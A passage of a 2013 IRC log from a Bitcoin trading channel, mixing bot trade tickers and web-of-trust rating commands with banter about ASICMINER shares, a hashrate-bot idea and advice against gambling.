http://bitcoin-otc.com/viewratingdetail.php?nick=thickasthieves May 23 21:45:21 i havent kept up with my wot May 23 21:45:26 i owe some people ratings May 23 21:46:10 ;;rate ThickAsThieves 3 Runs one hell of a tidy ship. May 23 21:46:29 Rating entry successful. Your rating of 3 for user ThickAsThieves has been recorded. May 23 21:46:39 hey thanks! May 23 21:46:48 you deserve it! May 23 21:48:59 ;;ident May 23 21:49:00 You are identified as user JWU42, with GPG key id 474919FF6AACA172, key fingerprint 06A1D6BCFD3223CB045B399D474919FF6AACA172, and bitcoin address 1JWU42QLGFESoQCC4iPzUDTRiC9nx5bi95 May 23 21:49:02 [HAVELOCK] [ASICM] 8 @ 0.0244 = 0.1952 BTC [+] May 23 21:50:26 [BTCTC] [COGNITIVE] 1 @ 0.3099 BTC [+] May 23 21:51:28 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [+] May 23 21:51:30 [BTCTC] [BASIC-MINING] 3 @ 0.6 = 1.8 BTC [+] May 23 21:52:03 [HAVELOCK] [ASICM] 20 @ 0.0242 = 0.484 BTC [-] May 23 21:53:02 [HAVELOCK] [ASICM] 34 @ 0.02402 = 0.8167 BTC [-] May 23 21:53:04 [HAVELOCK] [ASICM] 75 @ 0.02402 = 1.8015 BTC [-] May 23 21:53:28 ;;getrating inh May 23 21:53:29 WARNING: Currently not authenticated. User inh, rated since Thu May 12 16:15:32 2011. Cumulative rating 19, from 11 total ratings. Received ratings: 10 positive, 1 negative. Sent ratings: 10 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=inh May 23 21:54:03 [HAVELOCK] [ASICM] 483 @ 0.02401 = 11.5968 BTC [-] May 23 21:54:58 ;;ident deadweasel May 23 21:54:58 Nick 'deadweasel', with hostmask 'deadweasel!~deadwease@unaffiliated/deadweasel', is not identified. May 23 21:55:02 [HAVELOCK] [SDICE] 5 @ 0.2122 = 1.061 BTC [-] May 23 21:55:09 ;;eauth deadweasel May 23 21:55:11 Request successful for user deadweasel, hostmask deadweasel!~deadwease@unaffiliated/deadweasel. Get your encrypted OTP from http://bitcoin-otc.com/otps/6D206C24463BEC07 May 23 21:55:26 ;;rate ThickAsThieves 1 - runs a tight ship May 23 21:55:27 Rating entry successful. Your rating of 1 for user ThickAsThieves has been recorded. May 23 21:55:47 ;;everify freenode:#bitcoin-otc:195dd088f14ca93f1a2659e29f2b90479cb299851dd9a99ef124fac4 May 23 21:55:48 You are now authenticated for user DeadWeasel with key 6D206C24463BEC07 May 23 21:56:03 [HAVELOCK] [SDICE] 51 @ 0.212111 = 10.8177 BTC [-] May 23 21:56:09 ;;rate ThickAsThieves 1 - professional. May 23 21:56:10 Rating entry successful. Your rating for user ThickAsThieves has changed from 1 to 1. May 23 21:56:36 ;;getrating BitHub May 23 21:56:36 Currently authenticated from hostmask BitHub!~bithub@unaffiliated/bithub . User BitHub, rated since Wed Feb 6 18:18:53 2013. Cumulative rating 39, from 19 total ratings. Received ratings: 18 positive, 1 negative. Sent ratings: 18 positive, 6 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=BitHub May 23 21:56:39 >_> May 23 21:56:46 OTC orgy May 23 21:56:55 or WOT orgy May 23 21:56:59 not sure which May 23 21:57:02 [HAVELOCK] [ASICM] 44 @ 0.0244 = 1.0736 BTC [+] May 23 21:57:04 [HAVELOCK] [ASICM] 153 @ 0.0244 = 3.7332 BTC [+] May 23 21:57:12 pshaw May 23 21:57:18 thx guys :) May 23 21:57:31 so what was decided re: the AM PTs? May 23 21:57:39 [MPEX] [S.MPOE] 2956 @ 0.00070442 = 2.0823 BTC [-] May 23 21:57:39 [MPEX] [S.MPOE] 1103 @ 0.00070415 = 0.7767 BTC [-] May 23 21:57:41 nothing is changing May 23 21:57:53 1.2 prices for fiat and bithub? May 23 21:57:59 but burnside would be happy to be running his own PT May 23 21:58:06 but he's stuck May 23 21:58:27 odds are there wont be any changes May 23 21:58:39 without a lot of brainstorming and cooperation from BF May 23 21:59:30 who wants to buy 2 shiny AM-PT shares from me @ 2.489 May 23 21:59:58 auction them on the forum May 23 22:00:00 [BTCTC] [COGNITIVE] 2 @ 0.250001 = 0.5 BTC [-] May 23 22:00:06 auction PT shares? lol May 23 22:01:02 [HAVELOCK] [ASICM] 299 @ 0.0245 = 7.3255 BTC [+] May 23 22:01:03 [HAVELOCK] [ASICM] 4 @ 0.0245 = 0.098 BTC [+] May 23 22:01:11 [BTCTC] [COGNITIVE] 4 @ 0.25 = 1 BTC [-] May 23 22:01:25 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] May 23 22:02:05 [BTCTC] [GSDPT] 2 @ 0.00257 = 0.0051 BTC [-] May 23 22:02:18 2.48? May 23 22:02:36 cmon fiat500 give bithub a good hookup remmeber that free btc :P May 23 22:02:51 [BTCTC] [ASICMINER-PT] 2 @ 2.464 = 4.928 BTC [+] May 23 22:03:02 [HAVELOCK] [ASICM] 86 @ 0.0246 = 2.1156 BTC [+] May 23 22:03:19 BitHub: ill give u a 0.1 discount May 23 22:03:40 :P May 23 22:03:44 BitHub: why dont u just buy them on the exchange? May 23 22:04:02 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [+] May 23 22:04:04 i'll give you 2 btc for it May 23 22:04:19 ;;nethash May 23 22:04:20 87838.6932331 May 23 22:04:23 yeaauh May 23 22:04:35 ;;estimate May 23 22:04:35 Next difficulty estimate | 11995492.5382 based on data since last change | 12270736.4505 based on data for last three days May 23 22:04:55 http://asicminercharts.com/live/ May 23 22:04:59 who's responsible May 23 22:05:03 [HAVELOCK] [ASICM] 287 @ 0.0246 = 7.0602 BTC [+] May 23 22:05:48 [BTCTC] [ASICMINER-PT] 1 @ 2.4631 BTC [-] May 23 22:06:09 AM should just release another device called the bfl May 23 22:07:00 bfl and avalon should both just give up and submit all their funds and equipment to AM and beg for forgiveness May 23 22:07:20 [BTCTC] [ASICMINER-PT] 2 @ 2.463 = 4.926 BTC [-] May 23 22:07:48 New bitbet weekly - AM dividend will be under .02 per share (non PT dividend) May 23 22:07:59 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] May 23 22:08:54 [BTCTC] [ASICMINER-PT] 1 @ 2.12 BTC [+] May 23 22:09:27 fucking options giving me heart attacks :P May 23 22:09:33 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [+] May 23 22:12:38 [BTCTC] [ASICMINER-PT] 3 @ 2.463 = 7.389 BTC [+] May 23 22:13:25 [BTCTC] [ASICMINER-PT] 1 @ 2.4611 BTC [-] May 23 22:16:26 ThickAsThieves: we need an !AMhash May 23 22:18:11 [BTCTC] [TAT.ASICMINER] 14 @ 0.025689 = 0.3596 BTC [-] May 23 22:18:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.02569 = 0.2312 BTC [+] May 23 22:18:37 talk to kako May 23 22:18:52 i might be inclined to sponsor his work May 23 22:18:57 if he did May 23 22:20:10 id do it for free if i had an API... is there a realtime API? May 23 22:20:45 kako == kakobrekla? May 23 22:21:50 [MPEX] [S.MPOE] 6750 @ 0.00070453 = 4.7556 BTC [+] May 23 22:21:52 [MPEX] [S.MPOE] 1786 @ 0.00070727 = 1.2632 BTC [+] May 23 22:22:04 [MPEX] [S.MPOE] 10614 @ 0.00071048 = 7.541 BTC [+] May 23 22:22:30 yes May 23 22:31:12 [BTCTC] [B.YABMC] 10 @ 0.014 = 0.14 BTC [-] May 23 22:32:24 [BTCTC] [ASICMINER-PT] 1 @ 2.456101 BTC [-] May 23 22:36:50 [BTCTC] [TAT.ASICMINER] 34 @ 0.02501 = 0.8503 BTC [-] May 23 22:42:03 [HAVELOCK] [ASICM] 300 @ 0.0247 = 7.41 BTC [+] May 23 22:45:06 are you good at that stuff fiat500? May 23 22:48:02 [HAVELOCK] [KCIM] 1 @ 1.09 BTC [-] May 23 22:48:04 [HAVELOCK] [KCIM] 12 @ 1.086 = 13.032 BTC [-] May 23 22:49:01 [HAVELOCK] [HIM] 9 @ 2.2501 = 20.2509 BTC [-] May 23 22:50:03 [HAVELOCK] [SDICE] 4 @ 0.213 = 0.852 BTC [+] May 23 22:51:02 [HAVELOCK] [VTX] 3 @ 0.4112 = 1.2336 BTC [-] May 23 22:52:02 [BTCTC] [BITVPS] 12 @ 0.00081 = 0.0097 BTC [+] May 23 22:53:03 [HAVELOCK] [ASICM] 700 @ 0.0247 = 17.29 BTC [+] May 23 22:53:05 [HAVELOCK] [ASICM] 770 @ 0.0248 = 19.096 BTC [+] May 23 22:53:07 [BTCTC] [ASICMINER-PT] 1 @ 2.4561 BTC [-] May 23 22:54:03 [HAVELOCK] [ASICM] 2 @ 0.0248 = 0.0496 BTC [+] May 23 22:56:01 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] May 23 22:56:03 [HAVELOCK] [ASICM] 100 @ 0.0246 = 2.46 BTC [-] May 23 22:56:31 BitHub: i dont like rating myself May 23 22:56:44 how about some nostalgia https://bitcointalk.org/index.php?topic=153682.msg1634617#msg1634617 May 23 22:57:02 [HAVELOCK] [ASICM] 1 @ 0.0245 BTC [-] May 23 22:57:10 okey i mean, do you do irc bots n stuff May 23 22:58:02 [HAVELOCK] [ASICM] 1 @ 0.0241 BTC [-] May 23 22:58:21 [BTCTC] [COGNITIVE] 2 @ 0.289998 = 0.58 BTC [+] May 23 22:58:51 you can probly find some posts from me badmouthing the share value too May 23 22:58:57 And, of course, this gem https://bitcointalk.org/index.php?topic=153682.msg1633411#msg1633411 May 23 22:59:21 [BTCTC] [COGNITIVE] 1 @ 0.289999 BTC [+] May 23 22:59:43 at one point i lost faith because FC kept saying they were gonna get to 12TH and never did it May 23 23:00:00 ThickAsThieves: I'm not saying I didn't take a profit... but damn! 2.45 May 23 23:00:15 i have in the past, the kind of stuff i do on a daily basis is a lot more complex May 23 23:00:29 [BTCTC] [ASICMINER-PT] 2 @ 2.456 = 4.912 BTC [-] May 23 23:00:54 itll hit 2.7+ again May 23 23:01:00 cool fiat May 23 23:01:00 [BTCTC] [TAT.ASICMINER] 9 @ 0.02555 = 0.23 BTC [+] May 23 23:01:04 [BTCTC] [BTC-BOND] 1 @ 0.01019 BTC [+] May 23 23:01:17 [BTCTC] [TAT.ASICMINER] 25 @ 0.02555 = 0.6388 BTC [+] May 23 23:01:19 i would like to hire your services sometime May 23 23:01:58 if its something small/medium scale it isnt worth it for me to charge May 23 23:02:11 ill pm you May 23 23:02:56 cool :) May 23 23:03:49 it's intersting, the market approaches perfect information and still the players make what seem to be unrealistic bets May 23 23:04:13 optimator: its a self-fulfilling prophecy May 23 23:04:18 if enough people do it May 23 23:04:30 the herd is wrong, but you have to move with the herd May 23 23:04:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.02555 = 0.1022 BTC [+] May 23 23:04:47 https://bitcointalk.org/index.php?topic=153682.msg1634673#msg1634673 <- At 20% average over 6 years (my model does that) price per AM share should be in the 1.9-2.0 range with my risk profile and ROI expecations (20%/year) May 23 23:04:48 It's microecon 101 revisited... *I* maintain people are not rational May 23 23:05:11 ;;ticker May 23 23:05:12 BTCUSD ticker | Best bid: 125.21000, Best ask: 125.21001, Bid-ask spread: 0.00001, Last trade: 125.21001, 24 hour volume: 24212.04542808, 24 hour low: 122.26000, 24 hour high: 126.93446, 24 hour vwap: 124.99209 May 23 23:05:23 I'll never forget playing the beer game: http://en.wikipedia.org/wiki/Beer_distribution_game May 23 23:05:32 aknap3: of course, you are right. you can't fight it May 23 23:06:22 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:06:42 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:07:06 aknap3: how does the game play? May 23 23:07:34 it's awesome -- need a group of people. Even if you have played the game before and you know all the details you can't stop the wild fluctuations in supply and demand May 23 23:08:31 one one end you have the factory, on the other end yo uhave the consumer. in between, the distributors. the consumer places an order, and the order is passed down the line. Each participant loses money while they have either overstock or back-orders May 23 23:09:01 the customer orders are: 1, 2, 4, 8, 4, 4, 4 (and 4 for ever) but that exponential demand growth in the beginning triggers instability that lasts the whole game May 23 23:09:24 [BTCTC] [BASIC-MINING] 5 @ 0.6 = 3 BTC [+] May 23 23:10:15 and even if you know exactly what is going to happen, as a distributor, you have to play along. Fighting the wild swings makes things worse for you May 23 23:11:19 so much easier just playing startrek movie and new judge dredd back to back and doing a shot whenever you see a lens flare May 23 23:12:07 i'm never able to go longer than 10mins May 23 23:12:23 I'm thinking there would be a bit of inventory shrinkage May 23 23:12:24 why is BASIC-MINING doing so well May 23 23:12:43 avalon batch 2 and 3 coming May 23 23:12:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.0256 = 0.256 BTC [+] May 23 23:12:52 so their hashrate will grow massively May 23 23:12:56 I bought 20 shares at 0.5 May 23 23:13:02 hm May 23 23:13:19 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:13:21 probably a better short-term bet than COG then eh May 23 23:13:34 aknap3: I wish we played that game in my business classes May 23 23:13:38 COG seems a bit flakey.. potential for huge gain but risk is higher May 23 23:13:38 oh well, good thing im not in this for short-term bets May 23 23:13:59 [BTCTC] [TAT.ASICMINER] 18 @ 0.0256 = 0.4608 BTC [+] May 23 23:14:18 optimator: it was unforgettable (no actual beer though ) May 23 23:15:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.02559 = 0.0512 BTC [-] May 23 23:15:33 [BTCTC] [BASIC-MINING] 6 @ 0.6 = 3.6 BTC [+] May 23 23:15:59 aknap3: I'd want to run simulation a) w/o beer; b) with real beer; and c) with real beer at a bar! May 23 23:16:14 I'm guessing C would result in the best overall outcome May 23 23:16:17 [BTCTC] [BASIC-MINING] 36 @ 0.6 = 21.6 BTC [+] May 23 23:16:18 optimator: time to write a grant proposal May 23 23:16:19 [BTCTC] [ASICMINER-PT] 2 @ 2.441 = 4.882 BTC [-] May 23 23:16:44 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [+] May 23 23:16:54 [BTCTC] [BASIC-MINING] 50 @ 0.61 = 30.5 BTC [+] May 23 23:17:40 [BTCTC] [BASIC-MINING] 18 @ 0.62 = 11.16 BTC [+] May 23 23:18:47 [BTCTC] [BITVPS] 3 @ 0.00083 = 0.0025 BTC [+] May 23 23:19:39 [BTCTC] [ASICMINER-PT] 2 @ 2.441 = 4.882 BTC [-] May 23 23:19:49 Where's the best place to buy the new USB miners, in a quantity of 1? May 23 23:19:57 At a reasonable price. May 23 23:20:19 WILLdude: hold your BTC. Do not spend May 23 23:20:30 But where could I? May 23 23:20:40 in a paper wallet May 23 23:20:45 [BTCTC] [BITVPS] 10 @ 0.00081 = 0.0081 BTC [-] May 23 23:20:53 You know what I mean. May 23 23:20:57 then turn off computer and finish school. When you graduate you'll likely be able to pay for college May 23 23:21:01 ohai May 23 23:21:19 the alternative is you'll keep investing until you hit zero May 23 23:21:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.025011 = 0.5002 BTC [-] May 23 23:21:39 [BTCTC] [BASIC-MINING] 8 @ 0.62 = 4.96 BTC [+] May 23 23:21:49 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:22:11 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:22:21 aknap3: is that how it works? May 23 23:22:37 yes May 23 23:23:01 i think willdude doesnt realize that he is trying to spend money, not invest it May 23 23:23:11 which means he'll get to zero soon enough May 23 23:23:18 gambler mentality -- you will keep making bets until you have lost it all May 23 23:23:35 the only winning move is not to play May 23 23:23:41 WILLdude: i made 11btc gambling on satoshicircle May 23 23:23:47 Hah. May 23 23:23:52 WILLdude: this is painful but it is good advice May 23 23:24:04 Is there some strategy to that gambling? May 23 23:24:09 gah!! May 23 23:24:14 lol you're hopeless May 23 23:24:21 i knew you'd say that May 23 23:24:38 no there wasnt, i could have just as easily lost the 2btc i started with May 23 23:24:42 Well, obviously, there is no strategy to gambling. May 23 23:24:47 Stupid question. May 23 23:25:00 are you capable of losing $250 and moving on? May 23 23:25:06 I sometimes go on bitvegas. May 23 23:25:07 No May 23 23:25:11 WILLdude not a stupid question, it was a window into the workings of your mind. You must not invest! May 23 23:25:13 dont gamble May 23 23:25:25 http://www.thegenesisblock.com/bitcoin-trading-are-we-primed-for-a-major-move-higher/ May 23 23:25:37 BitVegas has a load of people who believe in gambler's fallacy. May 23 23:26:00 oh neat, jcpham who's behind that site? May 23 23:26:49 "Phil" May 23 23:27:04 I sometimes do Peerbet. May 23 23:27:16 But I'd rather not gamble. May 23 23:28:45 WILLdude: i was lying about that 11btc, please don't May 23 23:28:53 Why? May 23 23:29:04 I mean why lie. May 23 23:29:22 just wanted to see how you'd react May 23 23:29:36 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 23 23:29:36 most people would say "fucking retard" regardless of how much i said i made May 23 23:31:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [+] May 23 23:31:40 jcpham: hrmz, that article doesn't really say anything May 23 23:31:45 even the title is a question May 23 23:32:00 sounds like an article i'd share May 23 23:32:12 lol May 23 23:32:22 devoid of content May 23 23:33:13 [BTCTC] [BASIC-MINING] 4 @ 0.62 = 2.48 BTC [+] May 23 23:33:42 ;;bc,24hprc May 23 23:33:43 123.22 May 23 23:34:25 "Markets frequently see periods of low volatility and consolidation around a price level before making large moves higher." May 23 23:34:39 s/higher/higher, lower, or more sideways/ May 23 23:35:31 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [-] May 23 23:36:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] May 23 23:36:54 sad, its a really sweet looking site May 23 23:41:30 [BTCTC] [ASICMINER-PT] 1 @ 2.411 BTC [-] May 23 23:41:40 ;;ticker May 23 23:41:41 BTCUSD ticker | Best bid: 125.30001, Best ask: 125.50000, Bid-ask spread: 0.19999, Last trade: 125.50000, 24 hour volume: 24341.11155891, 24 hour low: 122.26000, 24 hour high: 126.93446, 24 hour vwap: 125.02370 May 23 23:42:26 [BTCTC] [ASICMINER-PT] 1 @ 2.410001 BTC [-] May 23 23:42:44 [BTCTC] [ASICMINER-PT] 4 @ 2.41 = 9.64 BTC [-] May 23 23:43:04 [BTCTC] [ASICMINER-PT] 1 @ 2.400002 BTC [-] May 23 23:43:09 [BTCTC] [ASICMINER-PT] 8 @ 2.4 = 19.2 BTC [-] May 23 23:43:31 hrmz May 23 23:46:13 [BTCTC] [ASICMINER-PT] 1 @ 2.39 BTC [-] May 23 23:47:17 [MPEX] [S.MPOE] 7250 @ 0.00070552 = 5.115 BTC [-] May 23 23:47:19 [MPEX] [S.MPOE] 16536 @ 0.00071048 = 11.7485 BTC [+] May 23 23:47:31 [MPEX] [S.MPOE] 14100 @ 0.00071056 = 10.0189 BTC [+] May 23 23:51:57 [MPEX] [S.MPOE] 1064 @ 0.00071111 = 0.7566 BTC [+] May 23 23:52:12 [BTCTC] [COGNITIVE] 8 @ 0.289998 = 2.32 BTC [-] May 23 23:54:30 [BTCTC] [ASICMINER-PT] 5 @ 2.439978 = 12.1999 BTC [+] May 23 23:54:55 [BTCTC] [ASICMINER-PT] 1 @ 2.352 BTC [-] May 23 23:58:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.02546 = 0.2546 BTC [-] May 23 23:59:13 [BTCTC] [ASICMINER-PT] 1 @ 2.439977 BTC [+] May 23 23:59:14 [BTCTC] [ASICMINER-PT] 1 @ 2.439978 BTC [+] May 23 23:59:15 [BTCTC] [ASICMINER-PT] 21 @ 2.441 = 51.261 BTC [+] May 23 23:59:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02544 BTC [-] May 24 00:02:28 ripple is now down to 8200/1 May 24 00:07:37 Ans suddenly SDICE has made up for the 3K loss earlier this month and is now positive again. Yeah, rite... May 24 00:07:45 Good night, people. TTYL. May 24 00:08:45 [BTCTC] [PAJKA.BOND] 5 @ 0.1095 = 0.5475 BTC [-] May 24 00:09:08 [BTCTC] [PAJKA.BOND] 3 @ 0.109988 = 0.33 BTC [+] May 24 00:14:02 Hello May 24 00:17:41 It's unlucky that I bought back my btc before I discovered bitinstant, which would have worked. May 24 00:19:58 [MPEX] [S.MPOE] 8905 @ 0.00070415 = 6.2705 BTC [-] May 24 00:22:13 Willdude123: if you do anything impulsive without any research, its not unlucky. it's retarded :) May 24 00:22:48 Actually, I guess I made the good decision to buy my shares back. May 24 00:23:04 I guess It's luck I now know about it. May 24 00:23:11 tomorrow you'll doubt it and sell them again May 24 00:23:18 How much does that bitcurex card cost? May 24 00:23:28 No, I won't May 24 00:32:24 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] May 24 00:34:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02471 BTC [-] May 24 00:34:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.02461 = 1.2305 BTC [-] May 24 00:34:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.02455 = 0.0491 BTC [-] May 24 00:34:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.02453 = 0.9812 BTC [-] May 24 00:37:03 [HAVELOCK] [ASICM] 1 @ 0.02479 BTC [+] May 24 00:37:04 [HAVELOCK] [ASICM] 21 @ 0.02478 = 0.5204 BTC [-] May 24 00:37:11 [BTCTC] [BITVPS] 1 @ 0.00082 BTC [+] May 24 00:37:41 [BTCTC] [TAT.ASICMINER] 23 @ 0.025 = 0.575 BTC [+] May 24 00:38:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [+] May 24 00:40:31 [BTCTC] [BITVPS] 6 @ 0.00083 = 0.005 BTC [+] May 24 00:40:35 [BTCTC] [BTC-BOND] 3 @ 0.01019 = 0.0306 BTC [+] May 24 00:42:02 [HAVELOCK] [ASICM] 32 @ 0.02479 = 0.7933 BTC [+] May 24 00:42:03 [HAVELOCK] [ASICM] 20 @ 0.0248 = 0.496 BTC [+] May 24 00:44:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.024999 = 0.5 BTC [-] May 24 00:45:00 [BTCTC] [TAT.ASICMINER] 13 @ 0.024999 = 0.325 BTC [-] May 24 00:51:16 [BTCTC] [BASIC-MINING] 5 @ 0.62 = 3.1 BTC [+] May 24 00:51:58 http://www.thegenesisblock.com/us-regulators-confusion-around-bitcoin-is-exactly-why-no-one-wants-them-involved/ May 24 00:52:02 [HAVELOCK] [ASICM] 208 @ 0.0248 = 5.1584 BTC [+] May 24 00:52:03 [HAVELOCK] [ASICM] 41 @ 0.0248 = 1.0168 BTC [+] May 24 00:55:02 [HAVELOCK] [ASICM] 4 @ 0.02488 = 0.0995 BTC [+] May 24 00:55:23 old link is old May 24 00:55:30 sry May 24 00:55:42 just digging thru the site for the first time May 24 00:55:53 keep 'em comin TAT May 24 00:55:58 is naice site May 24 00:56:09 wow bart chilton looks terrifying May 24 00:56:10 who is this phil chap i wonder May 24 00:56:57 dub, I have +17 trust on the forums, are you jelly? May 24 00:57:15 hardly surprising May 24 00:57:17 who should I scam first? May 24 00:57:21 lmfao May 24 00:59:51 yeah who is this phil character? May 24 01:00:03 and also jonathan stacke? May 24 01:00:17 TAT investments, pied piper of the $3 investment crowd May 24 01:00:48 lol May 24 01:01:14 benkay i have no idea who these people are May 24 01:01:47 [BTCTC] [S.DICE-PT] 15 @ 0.002875 = 0.0431 BTC [-] May 24 01:02:00 ThickAsThieves is taking my firstborn May 24 01:02:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4409 BTC [-] May 24 01:02:28 can i sell fractional babies? May 24 01:02:55 can we have fractional shares without a PT? May 24 01:03:07 mircea_popescu: https://bitcointalk.org/index.php?action=trust;u=51125 ... this is meant to be the other way around, no? May 24 01:03:40 oh i forgot about you jurov May 24 01:03:43 sry May 24 01:03:51 +trust coming right up May 24 01:04:01 well, bitstamp finally caught up to gox May 24 01:04:17 in what sense, fiat500? May 24 01:04:26 incredible reality distortion field those fuckers were in last week May 24 01:04:47 in the sense that best bid is no longer 116 May 24 01:05:01 more like 124 May 24 01:05:13 https://bitcointalk.org/index.php?action=trust;u=51125 May 24 01:05:43 yes terrible fiat500 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected May 24 01:05:47 [BTCTC] [BITVPS] 21 @ 0.00083 = 0.0174 BTC [+] May 24 01:05:55 ThickAsThieves: so you're playing the game May 24 01:06:34 kakobrekla: i see btc-e is still behind May 24 01:06:37 [BTCTC] [BITVPS] 6 @ 0.00083 = 0.005 BTC [+] May 24 01:06:41 of course i'm playing May 24 01:06:46 i think it's a good idea May 24 01:06:47 kakobrekla: how are you getting the ASICMINER data for asicminercharts.com May 24 01:06:57 despite dub's warnings May 24 01:07:02 [HAVELOCK] [ASICM] 150 @ 0.0248 = 3.72 BTC [-] May 24 01:07:07 wha? May 24 01:07:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 24 01:07:24 id like to write an instantaneous !AMhash like ;;nethash May 24 01:07:32 to get current asicminer hashrate May 24 01:07:47 thats not mine May 24 01:07:52 u wot May 24 01:07:59 ThickAsThieves: didnt u say it was kako May 24 01:08:07 no, May 24 01:08:13 i said kako runs this channel May 24 01:08:20 oh May 24 01:08:33 the guy that runs that website, May 24 01:08:35 this channel runs itself May 24 01:08:40 is smiguel May 24 01:08:46 on the forums May 24 01:08:51 ew forums May 24 01:09:03 can anyone make functions in this channel kako? May 24 01:09:10 like May 24 01:09:12 ;;email May 24 01:09:12 Error: "email" is not a valid command. May 24 01:09:14 if that anyone is kako May 24 01:09:17 $email May 24 01:09:18 ThickAsThieves: To sign up for this service, contact smickles. Cost will be 0.01 BTC. May 24 01:09:27 so you do run the channel May 24 01:09:29 :P May 24 01:09:42 lol May 24 01:09:45 however superserving it may be May 24 01:09:55 you got the keys May 24 01:10:31 ThickAsThieves: anyone could pick their own prefix and put a bot in here May 24 01:10:44 in theory but not in practice May 24 01:10:50 haha May 24 01:11:02 lol May 24 01:11:13 ;;amhash May 24 01:11:13 Error: "amhash" is not a valid command. May 24 01:11:15 then TAT is correct May 24 01:11:20 kako can you fix amhash May 24 01:11:23 its not working May 24 01:11:24 haha May 24 01:12:05 ! May 24 01:12:07 if fiat500 writes it, will you implement? May 24 01:12:20 where are you pulling the number from May 24 01:12:21 grr what's the mpex quote format? May 24 01:12:34 blockchain May 24 01:12:39 i think May 24 01:12:47 lemme check something May 24 01:12:50 kakobrekla: will have to ask smiguel where he gets his data for asicminercharts.com May 24 01:13:02 [HAVELOCK] [ASICM] 2 @ 0.02488 = 0.0498 BTC [+] May 24 01:13:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.0246 = 0.0984 BTC [-] May 24 01:13:58 ThickAsThieves: how would it be in the blockchain if the majority of the rate is in pools May 24 01:14:03 [HAVELOCK] [ASICM] 8 @ 0.02488 = 0.199 BTC [+] May 24 01:14:42 just the solo part May 24 01:14:50 i assume the rest comes from each pool May 24 01:14:57 oh, kakobrekla had no trolltalk trust .. till now ;) May 24 01:15:01 hmm May 24 01:15:05 you can contact smiguel here https://bitcointalk.org/index.php?action=profile;u=59002 May 24 01:15:49 dont see a way to pm on the forum May 24 01:16:01 [BTCTC] [TAT.ASICMINER] 29 @ 0.02435 = 0.7062 BTC [-] May 24 01:16:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.024302 = 0.0486 BTC [-] May 24 01:16:12 [BTCTC] [TAT.ASICMINER] 48 @ 0.02426 = 1.1645 BTC [-] May 24 01:16:19 [BTCTC] [TAT.ASICMINER] 33 @ 0.024252 = 0.8003 BTC [-] May 24 01:17:20 can forum newbs not pm or something? May 24 01:17:24 his pm link https://bitcointalk.org/index.php?action=pm;sa=send;u=59002 May 24 01:17:31 re jurov. May 24 01:17:53 "You are not allowed to send personal messages." May 24 01:18:17 too n3wb May 24 01:18:21 pm me your questions and i'll send to him May 24 01:19:18 "hi, i'd like to build an instantaneous hashrate checker for ASICMINER in an IRC bot, interested to know how you're getting your data for asicminercharts.com" May 24 01:22:19 [BTCTC] [TAT.ASICMINER] 37 @ 0.024252 = 0.8973 BTC [-] May 24 01:22:22 [BTCTC] [TAT.ASICMINER] 40 @ 0.024252 = 0.9701 BTC [-] May 24 01:23:02 [HAVELOCK] [ASICM] 4 @ 0.02488 = 0.0995 BTC [+] May 24 01:25:59 [MPEX] [S.MPOE] 4321 @ 0.0007111 = 3.0727 BTC [+] May 24 01:26:01 [MPEX] [S.MPOE] 329 @ 0.00071118 = 0.234 BTC [+] May 24 01:28:52 ;;seen mircea_popescu May 24 01:28:52 mircea_popescu was last seen in #bitcoin-assets 11 hours, 34 minutes, and 40 seconds ago: wonder what Chaang-Noi & the merry pumpers will be inflating next. May 24 01:29:30 !ticker m^oix May 24 01:29:30 The round stones beneath the earth... have spoken through the fire. May 24 01:29:36 !ticker m ^oix May 24 01:29:38 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) May 24 01:30:33 ;;later tell mircea_popescu is OIX busted? May 24 01:30:33 The operation succeeded. May 24 01:33:39 ;;later tell mircea_popescu how you doooooin' *clicks fingers* May 24 01:33:39 The operation succeeded. May 24 01:34:58 [BTCTC] [ASICMINER-PT] 1 @ 2.42995 BTC [-] May 24 01:35:02 [HAVELOCK] [ASICM] 401 @ 0.02488 = 9.9769 BTC [+] May 24 01:36:08 [BTCTC] [ASICMINER-PT] 2 @ 2.4019 = 4.8038 BTC [-] May 24 01:36:10 [BTCTC] [ASICMINER-PT] 1 @ 2.401001 BTC [-] May 24 01:36:12 [BTCTC] [ASICMINER-PT] 2 @ 2.401 = 4.802 BTC [-] May 24 01:36:23 [BTCTC] [ASICMINER-PT] 1 @ 